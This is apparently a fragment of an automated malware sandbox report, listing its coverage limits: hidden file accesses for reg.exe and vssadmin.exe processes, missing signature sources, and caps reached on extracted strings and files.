- Not all file accesses are visible for reg.exe (PID: 3680)
- Not all file accesses are visible for reg.exe (PID: 3720)
- Not all file accesses are visible for vssadmin.exe (PID: 1236)
- Not all file accesses are visible for vssadmin.exe (PID: 1940)
- Not all sources for signature ID "api-55" are available in the report
- Not all sources for signature ID "binary-0" are available in the report
- Not all sources for signature ID "binary-10" are available in the report
- Not all sources for signature ID "hooks-8" are available in the report
- Not all sources for signature ID "mutant-0" are available in the report
- Not all sources for signature ID "registry-25" are available in the report
- Not all sources for signature ID "registry-55" are available in the report
- Not all sources for signature ID "string-0" are available in the report
- Not all strings are visible in the report, because the maximum number of strings was reached (5000)
- Touched the maximum number of extracted files (2000), report might not contain information about some extracted files